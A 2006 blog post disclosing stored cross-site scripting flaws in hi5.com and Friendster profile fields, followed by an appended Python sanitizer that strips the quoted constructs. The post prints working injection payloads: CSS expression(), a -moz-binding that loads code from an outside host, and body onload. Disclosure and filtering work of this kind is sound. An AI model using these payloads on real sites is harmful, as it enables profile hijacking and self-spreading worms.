Digger's blog

Thursday, July 06, 2006

 

hi5.com and friendster.com vulnerable to cross site scripting

Well, it only took me 10 minutes for hi5.com and 5 minutes for Friendster.com to find cross site scripting vulnerabilities.

Remember the MySpace worm (samy is my hero)?
Both of these websites are in the same situation and a worm can be easily created using these vulnerabilities. It's very interesting how they manage to go online without doing some basic security testing.

Some details about the vulnerabilities:

For hi5.com,

If you have an account, when you edit your profile at

http://hi5.com/friend/account/editProfileLifestyle.do

You can enter the payload in the About me section (for example).
<span style ="font: Comic Sans MS; font-size: 20px; color:red">whatever</span><span style ="font: Comic Sans MS; font-size: 20px; color:blue; xss:expression(alert('XSS-IE')) ">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
</span>

I found one XSS for Internet Explorer and one for Firefox and combined them :P

For Friendster.com,
Just edit your profile and a simple <body onload="alert(1);"> does the job just fine.

Here is a sample profile:

If you want to know more about XSS, the best resource is RSnake's page.
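A server-side allowlist filter for the profile field, showing how the constructs quoted above (expression() inside a style attribute, a <STYLE> block carrying -moz-binding, and <body onload>) are dropped before the profile is stored. This is an added example, not code from the original post or from either site; the tag list, the CSS allowlist and all names are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Assumed policy: three formatting tags, no attributes except a cleaned style on <span>.
ALLOWED_TAGS = {"span", "b", "i"}
DROP_WITH_CONTENT = {"style", "script"}
SAFE_CSS = {
    "color": re.compile(r"#[0-9a-f]{3,6}|[a-z]+"),
    "font-size": re.compile(r"\d{1,2}px"),
}

def clean_style(value):
    """Allowlist: keep a declaration only if its whole value matches SAFE_CSS."""
    kept = []
    for decl in value.split(";"):
        prop, sep, val = (s.strip().lower() for s in decl.partition(":"))
        rule = SAFE_CSS.get(prop)
        if sep and rule and rule.fullmatch(val):  # expression(...), url(...) never match
            kept.append(f"{prop}: {val}")
    return "; ".join(kept)

class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1  # swallow everything up to the closing tag
        elif tag in ALLOWED_TAGS and not self.skip:
            style = clean_style(dict(attrs).get("style") or "") if tag == "span" else ""
            self.out.append(f'<{tag} style="{html.escape(style)}">' if style else f"<{tag}>")
    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))  # text is always re-encoded

def sanitize(fragment):
    parser = ProfileSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

# Constructed sample input; prints <span style="color: red">hi</span>
print(sanitize('<span style="color:red; x:expression(alert(1))" onclick="x()">hi</span>'))
```

The filter does not balance tags, so a stray closing tag can still disturb page layout; a production filter would also close or drop unmatched elements.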
